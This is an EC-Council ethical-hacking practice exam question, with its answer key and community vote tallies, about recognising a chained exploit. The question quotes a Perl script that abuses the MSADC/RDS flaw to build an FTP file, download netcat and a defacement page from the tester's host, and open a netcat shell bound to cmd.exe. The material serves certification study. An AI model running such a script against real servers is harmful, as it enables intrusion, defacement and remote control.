nerdexam
EC-Council

312-50V10 · Question #303

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On furth

The correct answer is B. A chained exploit. The script chains multiple msadc.pl invocations together to build an FTP command file and then download netcat, making this a chained exploit rather than a single-vector attack.

System Hacking

Question

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:

system("perl msadc.pl -h $host -C "echo open $your >testfile""); system("perl msadc.pl -h $host -C "echo $user>>testfile""); system("perl msadc.pl -h $host -C "echo $pass>>testfile""); system("perl msadc.pl -h $host -C "echo bin>>testfile""); system("perl msadc.pl -h $host -C "echo get nc.exe>>testfile""); system("perl msadc.pl -h $host -C "echo get hacked.html>>testfile""); ("perl msadc.pl -h $host -C "echo quit>>testfile""); system("perl msadc.pl -h $host -C "ftp -s:testfile""); $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); Which exploit is indicated by this script?

Options

  • AA buffer overflow exploit
  • BA chained exploit
  • CA SQL injection exploit
  • DA denial of service exploit

How the community answered

(60 responses)
  • A
    5% (3)
  • B
    85% (51)
  • C
    8% (5)
  • D
    2% (1)

Why each option

The script chains multiple msadc.pl invocations together to build an FTP command file and then download netcat, making this a chained exploit rather than a single-vector attack.

AA buffer overflow exploit

A buffer overflow exploit overwrites memory boundaries to hijack execution flow, which is not what the sequential perl system() calls are doing here.

BA chained exploitCorrect

A chained exploit combines multiple steps or vulnerabilities in sequence to achieve a goal that no single step could accomplish alone. Here, the MSADC/RDS vulnerability is invoked repeatedly to write an FTP script line by line, and then FTP is used to pull down nc.exe and a defaced HTML file - each step depends on the previous one, forming a chain.

CA SQL injection exploit

A SQL injection exploit manipulates database queries through unsanitized input, which is unrelated to the MSADC RDS vulnerability being abused in this script.

DA denial of service exploit

A denial of service exploit floods or crashes a target to make it unavailable, whereas this script aims to download tools and maintain access, not disrupt service.

Concept tested: Chained exploit technique using MSADC RDS vulnerability

Source: https://learn.microsoft.com/en-us/security-updates/securitybulletins/1998/ms98-004

Topics

#chained exploit#msadc.pl#Perl scripting#FTP exploitation

Community Discussion

No community discussion yet for this question.

Full 312-50V10 Practice